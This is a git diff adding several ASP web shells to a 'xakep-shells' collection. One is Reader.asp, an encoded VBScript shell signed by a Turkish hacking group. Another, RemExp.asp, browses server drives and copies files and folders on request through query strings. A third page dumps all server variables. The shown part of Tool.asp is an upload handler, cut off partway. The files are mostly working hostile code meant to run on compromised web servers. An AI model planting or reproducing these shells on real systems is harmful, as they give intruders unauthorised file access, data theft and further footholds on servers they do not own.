+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Bat�l Zail Oldu..
+-->
\ No newline at end of file
diff --git a/xakep-shells/ASP/Reader.asp.txt b/xakep-shells/ASP/Reader.asp.txt
new file mode 100644
index 0000000..6cec6a0
--- /dev/null
+++ b/xakep-shells/ASP/Reader.asp.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9���x�"P��bx~P�+30�.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,�x+hsbP�"+^sb�k~"l0kw^+MrPVk8k,|Cz�DP`^Go*P@!(.@*Y!Yslhld�[�MR R@!sk@*A;~UmDr2DkUPgCk�V~nE^Vl	�Vm^l��,5CD9�:~$�^�:�x9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klU�y,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~A�^�:�	Nnx~)HD�UY�^�~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.N�sP#n,f+kO+0V+MrUNx,fGVCz�,CGVH9+sWU~j+P3VKDG:mUEl~�KW0PK�+0V�D,2[+Mkh c@!Vb@*?1DkaOr:bybP!�\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmx�s~Cm3V�x9l~!xk�,$k^ok,)s:m3,��kUP( gRoPz[:bx~#Xl~!�M+-VbsDrHVPM�M���x�. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$�I,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACO�^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6�x[C	PqcHRwPKChPzN�	l~5C"�^:��O�Dc@!4M@*@!sb@*�m.nDVrPjn,�m.Ykky,bk2P_WdY^l.�U,K�:�	[+,�lV���M  @!(D@*@!sk@*@!J4@*b9.+kPjCD�D�PF�ds�xCPnG9EU!PV�D�xD�Vh+0P�dYNr�r	ky,9WkXl	�U~b9�x�,XCy�U c@!8D@*@!Vb@*PnXYl.nmP$�V�s�~A�+.,AK�/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lU�U,fG/HCVmD�U�~V�D�xO�sXn4bss+V,��k	PbHx�,j+M\nD9+~6^:l	�"Pdly�s~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPn�ds�xC,Km:Pj+MrPVk.k^k.~v�Dx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^l�hl@!8D@*@!sr@*bNhr	P�r0MnkkUbP�mV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,f�+.Vn.bP�CVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slM�x�P�	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACf�@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlar� G�ster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail G�nder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yard�m" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Bat�l Zail Oldu..
+-->
\ No newline at end of file
diff --git a/xakep-shells/ASP/RemExp.asp.txt b/xakep-shells/ASP/RemExp.asp.txt
new file mode 100644
index 0000000..c8faa18
--- /dev/null
+++ b/xakep-shells/ASP/RemExp.asp.txt
@@ -0,0 +1,250 @@
+<%@ Language=VBScript %>
+<%
+Option Explicit
+
+Dim giCount
+Dim gvAttributes
+
+Dim Ext
+
+Dim ScriptFolder
+Dim FolderPath
+
+Dim FileSystem
+Dim Drives
+Dim Drive
+Dim Folders
+Dim Folder
+Dim SubFolders
+Dim SubFolder
+Dim Files
+Dim File
+
+Dim BgColor, BackgroundColor,FSO
+
+If Request.QueryString("CopyFolder") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
+End If
+
+If Request.QueryString("CopyFile") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
+End If
+
+Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
+
+FolderPath = Request.QueryString("FolderPath")
+
+If FolderPath = "" Then
+ FolderPath = Request.ServerVariables("PATH_TRANSLATED")
+End If
+
+FolderPath = ParseFolder(FolderPath)
+
+ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
+
+%>
+<html>
+<head>
+<title>Remote Explorer</title>
+<style type="text/css">
+BODY
+{
+ BACKGROUND-COLOR: #C0C0C0
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+ MARGIN: 0px
+}
+td, input, select
+{
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+}
+.Address
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: 1px center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+.Go
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: left center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+</style>
+</head>
+<body bgcolor="#c0c0c0">
+<table width="100%" cellpadding="0" cellspacing="0" border="0">
+<tr>
+<form>
+<td width="1%" nowrap>   
+<select name="FolderPath" id="Drive">
+<%
+Set Drives = FileSystem.Drives
+For Each Drive In Drives
+ Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
+ If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
+  Response.Write ">"
+  Response.Write Drive.DriveLetter & " - "
+  If Drive.DriveType = "Remote" Then
+   Response.Write Drive.ShareName & " [share]"
+  ElseIf Drive.DriveLetter <> "A" Then
+   If Drive.IsReady Then
+    Response.Write Drive.VolumeName
+   Else
+    Response.Write "(Not Ready)"
+   End If
+  Else
+   Response.Write "(Skiped Detection)"
+  End If
+  Response.Write "</OPTION>"
+ Next
+%>
+</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
+</td>
+</form>
+<td width="1%">   Address: </td>
+<form>
+<td width="100%">
+<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
+</td>
+<td width="1%">
+<input class="Go" type="submit" value="Go"style="border:1px outset">
+</td>
+</form>
+</tr>
+</table>
+<%
+Set Folder = FileSystem.GetFolder(FolderPath)
+Set SubFolders = Folder.SubFolders
+Set Files = Folder.Files
+%>
+<br>
+<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
+<tr>
+<td width="40%" height="20" bgcolor="silver">  Name</td>
+<td width="10%" bgcolor="silver" align="right">Size    </td>
+<td width="20%" bgcolor="silver">Type </td>
+<td width="20%" bgcolor="silver">Modified </td>
+<td width="10%" bgcolor="silver" align="right">Attributes  </td>
+</tr>
+<%
+If Not Folder.IsRootFolder Then
+ BgToggle
+%>
+<tr title="Top Level">
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%BgToggle%>
+<tr>
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">�</font> Up One Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%
+End If
+For Each SubFolder In SubFolders
+ BgToggle
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%>  </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
+</tr>
+<%
+Next
+For Each File In Files
+ BgToggle
+ Ext = FileExtension(File.Name)
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte  </td>
+<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
+<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
+</tr>
+<%Next%>
+</table>
+</body>
+</html>
+<%
+Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
+    Dim lsResult
+    Dim llTemp
+    Dim giCount
+    MaxValuePerIndex = MaxValuePerIndex + 1
+    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
+        MinUpperBound = MinUpperBound + 1
+    Loop
+    For giCount = MinUpperBound To 0 Step -1
+        llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
+        lsResult = lsResult & CStr(llTemp)
+        If giCount > 0 Then lsResult = lsResult & IndexSeperator
+        SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
+    Next
+    ConvertBinary = lsResult
+End Function
+
+Private Sub BgToggle()
+ BackgroundColor = Not(BackgroundColor)
+ If BackgroundColor Then
+  BgColor = "#efefef"
+ Else
+  BgColor = "#ffffff"
+ End If
+End Sub
+
+Private Function Attributes(AttributeValue)
+ Dim lvAttributes
+ Dim lsResult
+ lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
+ If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
+ If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
+ If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
+ If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
+ Attributes = lsResult
+End Function
+
+Private Function FileExtension(FileName)
+ Dim lsExt
+ Dim liCount
+ For liCount = Len(FileName) To 1 Step -1
+  If Mid(FileName, liCount, 1) = "." Then
+   lsExt = Right(FileName, Len(FileName) - liCount)
+   Exit For
+  End If
+ Next
+ If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
+  lsExt = ""
+ End If
+ FileExtension = lsExt
+End Function
+
+Private Function ParseFolder(PathString)
+ Dim liCount
+ If Right(PathString, 1) = "\" Then
+  ParseFolder = PathString
+ Else
+  For liCount = Len(PathString) To 1 Step -1
+   If Mid(PathString, liCount, 1) = "\" Then
+    ParseFolder = Left(PathString, liCount)
+    Exit For
+   End If
+  Next
+ End If
+End Function
+%>
+
diff --git a/xakep-shells/ASP/Server Variables.asp.txt b/xakep-shells/ASP/Server Variables.asp.txt
new file mode 100644
index 0000000..e9b0318
--- /dev/null
+++ b/xakep-shells/ASP/Server Variables.asp.txt	
@@ -0,0 +1,27 @@
+<%
+Dim Vars
+%>
+
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server 
+  variables : </strong> </font></p>
+<p><BR>
+  <BR>
+</p>
+<TABLE width="75%" BORDER=1 align="center" cellpadding="3" cellspacing="0">
+  <TR> 
+    <TD width="149"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Name</B></font></p>
+      </TD>
+    <TD width="333"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Value</B></font></p>
+      </TD>
+  </TR>
+  <% For Each Vars In Request.ServerVariables %>
+  <TR> 
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Vars %></FONT></TD>
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Request.ServerVariables(Vars) %>&nbsp;</FONT></TD>
+  </TR>
+  <% Next %>
+</TABLE>
diff --git a/xakep-shells/ASP/Tool.asp.txt b/xakep-shells/ASP/Tool.asp.txt
new file mode 100644
index 0000000..3856514
--- /dev/null
+++ b/xakep-shells/ASP/Tool.asp.txt
@@ -0,0 +1,792 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%
+On Error Resume Next
+Server.ScriptTimeOut  = 7200
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
